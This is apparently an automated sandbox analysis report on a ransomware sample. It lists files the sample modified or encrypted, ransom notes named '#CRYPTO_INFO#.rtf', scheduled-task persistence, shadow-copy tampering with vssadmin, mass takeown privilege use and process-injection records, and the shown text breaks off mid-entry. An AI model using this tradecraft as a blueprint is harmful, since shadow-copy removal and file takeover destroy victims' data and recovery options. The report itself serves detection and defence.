Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_RHP.aapp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-compat.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\plugins\rhp\generic-rhp-app-selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-ui.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_checkbox_selected_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\close.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\ccloud.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\index.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_distributed.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\iw_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_fr_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\spectrum_spinner.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\license.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\.eclipseproduct 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_download_audit_report_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\rhp_world_icon_hover.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\images\example_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ro.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Javascripts\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.app_1.3.200.v20130910-1609.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\go-mobile-2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\PFM\zy______.pfm 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\share_icons2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4556 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 948 vssadmin.exe -
Modifies Control Panel 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2168186643-810464528-1121082739-1000\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2168186643-810464528-1121082739-1000\Control Panel\Desktop\TileWallpaper = "0" reg.exe Key created \REGISTRY\USER\S-1-5-21-2168186643-810464528-1121082739-1000\Control Panel\Desktop reg.exe Key created \REGISTRY\USER\S-1-5-21-2168186643-810464528-1121082739-1000\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2168186643-810464528-1121082739-1000\Control Panel\Desktop\WallpaperStyle = "0" reg.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 4480 dgFQYQPu64.exe 4480 dgFQYQPu64.exe 4480 dgFQYQPu64.exe 4480 dgFQYQPu64.exe 4480 dgFQYQPu64.exe 4480 dgFQYQPu64.exe 4480 dgFQYQPu64.exe 4480 dgFQYQPu64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 4480 dgFQYQPu64.exe -
Suspicious use of AdjustPrivilegeToken 102 IoCs
description pid Process Token: SeTakeOwnershipPrivilege 4372 takeown.exe Token: SeDebugPrivilege 4480 dgFQYQPu64.exe Token: SeLoadDriverPrivilege 4480 dgFQYQPu64.exe Token: SeTakeOwnershipPrivilege 3840 takeown.exe Token: SeTakeOwnershipPrivilege 580 takeown.exe Token: SeTakeOwnershipPrivilege 4516 takeown.exe Token: SeTakeOwnershipPrivilege 4788 takeown.exe Token: SeTakeOwnershipPrivilege 4628 takeown.exe Token: SeTakeOwnershipPrivilege 4936 takeown.exe Token: SeTakeOwnershipPrivilege 4536 takeown.exe Token: SeTakeOwnershipPrivilege 4664 takeown.exe Token: SeTakeOwnershipPrivilege 5008 takeown.exe Token: SeBackupPrivilege 1656 vssvc.exe Token: SeRestorePrivilege 1656 vssvc.exe Token: SeAuditPrivilege 1656 vssvc.exe Token: SeTakeOwnershipPrivilege 4488 takeown.exe Token: SeTakeOwnershipPrivilege 2080 takeown.exe Token: SeIncreaseQuotaPrivilege 4860 WMIC.exe Token: SeSecurityPrivilege 4860 WMIC.exe Token: SeTakeOwnershipPrivilege 4860 WMIC.exe Token: SeLoadDriverPrivilege 4860 WMIC.exe Token: SeSystemProfilePrivilege 4860 WMIC.exe Token: SeSystemtimePrivilege 4860 WMIC.exe Token: SeProfSingleProcessPrivilege 4860 WMIC.exe Token: SeIncBasePriorityPrivilege 4860 WMIC.exe Token: SeCreatePagefilePrivilege 4860 WMIC.exe Token: SeBackupPrivilege 4860 WMIC.exe Token: SeRestorePrivilege 4860 WMIC.exe Token: SeShutdownPrivilege 4860 WMIC.exe Token: SeDebugPrivilege 4860 WMIC.exe Token: SeSystemEnvironmentPrivilege 4860 WMIC.exe Token: SeRemoteShutdownPrivilege 4860 WMIC.exe Token: SeUndockPrivilege 4860 WMIC.exe Token: SeManageVolumePrivilege 4860 WMIC.exe Token: 33 4860 WMIC.exe Token: 34 4860 WMIC.exe Token: 35 4860 WMIC.exe Token: 36 4860 WMIC.exe Token: SeTakeOwnershipPrivilege 5036 takeown.exe Token: SeTakeOwnershipPrivilege 4240 takeown.exe Token: SeIncreaseQuotaPrivilege 4860 WMIC.exe Token: SeSecurityPrivilege 4860 WMIC.exe Token: SeTakeOwnershipPrivilege 4860 WMIC.exe Token: SeLoadDriverPrivilege 4860 WMIC.exe Token: SeSystemProfilePrivilege 4860 WMIC.exe Token: SeSystemtimePrivilege 4860 WMIC.exe Token: SeProfSingleProcessPrivilege 4860 WMIC.exe Token: SeIncBasePriorityPrivilege 4860 WMIC.exe Token: SeCreatePagefilePrivilege 4860 WMIC.exe Token: SeBackupPrivilege 4860 WMIC.exe Token: SeRestorePrivilege 4860 WMIC.exe Token: SeShutdownPrivilege 4860 WMIC.exe Token: SeDebugPrivilege 4860 WMIC.exe Token: SeSystemEnvironmentPrivilege 4860 WMIC.exe Token: SeRemoteShutdownPrivilege 4860 WMIC.exe Token: SeUndockPrivilege 4860 WMIC.exe Token: SeManageVolumePrivilege 4860 WMIC.exe Token: 33 4860 WMIC.exe Token: 34 4860 WMIC.exe Token: 35 4860 WMIC.exe Token: 36 4860 WMIC.exe Token: SeTakeOwnershipPrivilege 4568 takeown.exe Token: SeTakeOwnershipPrivilege 4180 takeown.exe Token: SeTakeOwnershipPrivilege 2084 takeown.exe Token: SeTakeOwnershipPrivilege 5048 takeown.exe Token: SeTakeOwnershipPrivilege 4784 takeown.exe Token: SeTakeOwnershipPrivilege 4828 takeown.exe Token: SeTakeOwnershipPrivilege 1888 takeown.exe Token: SeTakeOwnershipPrivilege 4400 takeown.exe Token: SeTakeOwnershipPrivilege 4884 takeown.exe Token: SeTakeOwnershipPrivilege 4860 takeown.exe Token: SeTakeOwnershipPrivilege 4300 takeown.exe Token: SeTakeOwnershipPrivilege 4968 takeown.exe Token: SeTakeOwnershipPrivilege 1660 takeown.exe Token: SeTakeOwnershipPrivilege 268 takeown.exe Token: SeTakeOwnershipPrivilege 5228 takeown.exe Token: SeTakeOwnershipPrivilege 5380 takeown.exe Token: SeTakeOwnershipPrivilege 5988 takeown.exe Token: SeTakeOwnershipPrivilege 6140 takeown.exe Token: SeTakeOwnershipPrivilege 5252 takeown.exe Token: SeTakeOwnershipPrivilege 5356 takeown.exe Token: SeTakeOwnershipPrivilege 5484 takeown.exe Token: SeTakeOwnershipPrivilege 5828 takeown.exe Token: SeTakeOwnershipPrivilege 6000 takeown.exe Token: SeTakeOwnershipPrivilege 5156 takeown.exe Token: SeTakeOwnershipPrivilege 5364 takeown.exe Token: SeTakeOwnershipPrivilege 5432 takeown.exe Token: SeTakeOwnershipPrivilege 5764 takeown.exe Token: SeTakeOwnershipPrivilege 5244 takeown.exe Token: SeTakeOwnershipPrivilege 5324 takeown.exe Token: SeTakeOwnershipPrivilege 5492 takeown.exe Token: SeTakeOwnershipPrivilege 4852 takeown.exe Token: SeTakeOwnershipPrivilege 5308 takeown.exe Token: SeTakeOwnershipPrivilege 5544 takeown.exe Token: SeTakeOwnershipPrivilege 5876 takeown.exe Token: SeTakeOwnershipPrivilege 5656 takeown.exe Token: SeTakeOwnershipPrivilege 5572 takeown.exe Token: SeTakeOwnershipPrivilege 5428 takeown.exe Token: SeTakeOwnershipPrivilege 5716 takeown.exe Token: SeTakeOwnershipPrivilege 5756 takeown.exe Token: SeTakeOwnershipPrivilege 5748 takeown.exe Token: SeTakeOwnershipPrivilege 5280 takeown.exe -
Suspicious use of WriteProcessMemory 1254 IoCs
description pid Process procid_target PID 2196 wrote to memory of 1484 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 70 PID 2196 wrote to memory of 1484 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 70 PID 2196 wrote to memory of 1484 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 70 PID 2196 wrote to memory of 3860 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 72 PID 2196 wrote to memory of 3860 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 72 PID 2196 wrote to memory of 3860 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 72 PID 2196 wrote to memory of 1464 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 79 PID 2196 wrote to memory of 1464 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 79 PID 2196 wrote to memory of 1464 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 79 PID 2196 wrote to memory of 3896 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 80 PID 2196 wrote to memory of 3896 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 80 PID 2196 wrote to memory of 3896 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 80 PID 3896 wrote to memory of 4160 3896 cmd.exe 83 PID 3896 wrote to memory of 4160 3896 cmd.exe 83 PID 3896 wrote to memory of 4160 3896 cmd.exe 83 PID 1464 wrote to memory of 4172 1464 cmd.exe 84 PID 1464 wrote to memory of 4172 1464 cmd.exe 84 PID 1464 wrote to memory of 4172 1464 cmd.exe 84 PID 1464 wrote to memory of 4216 1464 cmd.exe 85 PID 1464 wrote to memory of 4216 1464 cmd.exe 85 PID 1464 wrote to memory of 4216 1464 cmd.exe 85 PID 2196 wrote to memory of 4232 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 86 PID 2196 wrote to memory of 4232 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 86 PID 2196 wrote to memory of 4232 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 86 PID 1464 wrote to memory of 4276 1464 cmd.exe 88 PID 1464 wrote to memory of 4276 1464 cmd.exe 88 PID 1464 wrote to memory of 4276 1464 cmd.exe 88 PID 4232 wrote to memory of 4336 4232 cmd.exe 89 PID 4232 wrote to memory of 4336 4232 cmd.exe 89 PID 4232 wrote to memory of 4336 4232 cmd.exe 89 PID 4232 wrote to memory of 4372 4232 cmd.exe 90 PID 4232 wrote to memory of 4372 4232 cmd.exe 90 PID 4232 wrote to memory of 4372 4232 cmd.exe 90 PID 4232 wrote to memory of 4428 4232 cmd.exe 92 PID 4232 wrote to memory of 4428 4232 cmd.exe 92 PID 4232 wrote to memory of 4428 4232 cmd.exe 92 PID 4428 wrote to memory of 4448 4428 cmd.exe 93 PID 4428 wrote to memory of 4448 4428 cmd.exe 93 PID 4428 wrote to memory of 4448 4428 cmd.exe 93 PID 4448 wrote to memory of 4480 4448 dgFQYQPu.exe 94 PID 4448 wrote to memory of 4480 4448 dgFQYQPu.exe 94 PID 4160 wrote to memory of 4512 4160 wscript.exe 95 PID 4160 wrote to memory of 4512 4160 wscript.exe 95 PID 4160 wrote to memory of 4512 4160 wscript.exe 95 PID 4512 wrote to memory of 4556 4512 cmd.exe 97 PID 4512 wrote to memory of 4556 4512 cmd.exe 97 PID 4512 wrote to memory of 4556 4512 cmd.exe 97 PID 2196 wrote to memory of 4584 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 98 PID 2196 wrote to memory of 4584 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 98 PID 2196 wrote to memory of 4584 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 98 PID 4160 wrote to memory of 4640 4160 wscript.exe 100 PID 4160 wrote to memory of 4640 4160 wscript.exe 100 PID 4160 wrote to memory of 4640 4160 wscript.exe 100 PID 4584 wrote to memory of 4672 4584 cmd.exe 102 PID 4584 wrote to memory of 4672 4584 cmd.exe 102 PID 4584 wrote to memory of 4672 4584 cmd.exe 102 PID 4640 wrote to memory of 4712 4640 cmd.exe 103 PID 4640 wrote to memory of 4712 4640 cmd.exe 103 PID 4640 wrote to memory of 4712 4640 cmd.exe 103 PID 4584 wrote to memory of 4732 4584 cmd.exe 104 PID 4584 wrote to memory of 4732 4584 cmd.exe 104 PID 4584 wrote to memory of 4732 4584 cmd.exe 104 PID 4584 wrote to memory of 4820 4584 cmd.exe 107 PID 4584 wrote to memory of 4820 4584 cmd.exe 107 PID 4584 wrote to memory of 4820 4584 cmd.exe 107 PID 4820 wrote to memory of 4840 4820 cmd.exe 108 PID 4820 wrote to memory of 4840 4820 cmd.exe 108 PID 4820 wrote to memory of 4840 4820 cmd.exe 108 PID 4584 wrote to memory of 4876 4584 cmd.exe 109 PID 4584 wrote to memory of 4876 4584 cmd.exe 109 PID 4584 wrote to memory of 4876 4584 cmd.exe 109 PID 2196 wrote to memory of 4924 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 110 PID 2196 wrote to memory of 4924 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 110 PID 2196 wrote to memory of 4924 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 110 PID 4924 wrote to memory of 4972 4924 cmd.exe 112 PID 4924 wrote to memory of 4972 4924 cmd.exe 112 PID 4924 wrote to memory of 4972 4924 cmd.exe 112 PID 4924 wrote to memory of 5004 4924 cmd.exe 113 PID 4924 wrote to memory of 5004 4924 cmd.exe 113 PID 4924 wrote to memory of 5004 4924 cmd.exe 113 PID 4924 wrote to memory of 5024 4924 cmd.exe 114 PID 4924 wrote to memory of 5024 4924 cmd.exe 114 PID 4924 wrote to memory of 5024 4924 cmd.exe 114 PID 5024 wrote to memory of 5040 5024 cmd.exe 115 PID 5024 wrote to memory of 5040 5024 cmd.exe 115 PID 5024 wrote to memory of 5040 5024 cmd.exe 115 PID 4924 wrote to memory of 5060 4924 cmd.exe 116 PID 4924 wrote to memory of 5060 4924 cmd.exe 116 PID 4924 wrote to memory of 5060 4924 cmd.exe 116 PID 2196 wrote to memory of 5084 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 117 PID 2196 wrote to memory of 5084 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 117 PID 2196 wrote to memory of 5084 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 117 PID 5084 wrote to memory of 3904 5084 cmd.exe 119 PID 5084 wrote to memory of 3904 5084 cmd.exe 119 PID 5084 wrote to memory of 3904 5084 cmd.exe 119 PID 5084 wrote to memory of 3840 5084 cmd.exe 120 PID 5084 wrote to memory of 3840 5084 cmd.exe 120 PID 5084 wrote to memory of 3840 5084 cmd.exe 120 PID 5084 wrote to memory of 3908 5084 cmd.exe 121 PID 5084 wrote to memory of 3908 5084 cmd.exe 121 PID 5084 wrote to memory of 3908 5084 cmd.exe 121 PID 3908 wrote to memory of 804 3908 cmd.exe 122 PID 3908 wrote to memory of 804 3908 cmd.exe 122 PID 3908 wrote to memory of 804 3908 cmd.exe 122 PID 5084 wrote to memory of 4176 5084 cmd.exe 123 PID 5084 wrote to memory of 4176 5084 cmd.exe 123 PID 5084 wrote to memory of 4176 5084 cmd.exe 123 PID 2196 wrote to memory of 4220 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 124 PID 2196 wrote to memory of 4220 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 124 PID 2196 wrote to memory of 4220 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 124 PID 4220 wrote to memory of 4100 4220 cmd.exe 126 PID 4220 wrote to memory of 4100 4220 cmd.exe 126 PID 4220 wrote to memory of 4100 4220 cmd.exe 126 PID 4220 wrote to memory of 580 4220 cmd.exe 127 PID 4220 wrote to memory of 580 4220 cmd.exe 127 PID 4220 wrote to memory of 580 4220 cmd.exe 127 PID 4220 wrote to memory of 4380 4220 cmd.exe 128 PID 4220 wrote to memory of 4380 4220 cmd.exe 128 PID 4220 wrote to memory of 4380 4220 cmd.exe 128 PID 4380 wrote to memory of 504 4380 cmd.exe 129 PID 4380 wrote to memory of 504 4380 cmd.exe 129 PID 4380 wrote to memory of 504 4380 cmd.exe 129 PID 4220 wrote to memory of 4464 4220 cmd.exe 130 PID 4220 wrote to memory of 4464 4220 cmd.exe 130 PID 4220 wrote to memory of 4464 4220 cmd.exe 130 PID 2196 wrote to memory of 2144 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 131 PID 2196 wrote to memory of 2144 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 131 PID 2196 wrote to memory of 2144 2196 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe 131 PID 4752 wrote to memory of 948 4752 cmd.exe 133 PID 4752 wrote to memory of 948 4752 cmd.exe 133 PID 2144 wrote to memory of 4572 2144 cmd.exe 134 PID 2144 wrote to memory of 4572 2144 cmd.exe 134 PID 2144 wrote to memory of 4572 2144 cmd.exe 134 PID 2144 wrote to memory of 4516 2144 cmd.exe 135 PID 2144 wrote to memory of 4516 2144 cmd.exe 135 PID 2144 wrote to memory of 4516 2144 cmd.exe 135 PID 2144 wrote to memory of 4548 2144 cmd.exe 136 PID 2144 wrote to memory of 4548 2144 cmd.exe 136 PID 2144 wrote to memory of 4548 2144 cmd.exe 136 PID 4548 wrote to memory of 4632 4548 cmd.exe 137 PID 4548 wrote to memory of 4632 4548 cmd.exe 137 PID 4548 wrote to memory of 4632 4548 cmd.exe 137 PID 2144 wrote to memory of 4164 2144 cmd.exe 138 PID 2144 wrote to memory of 4164 2144 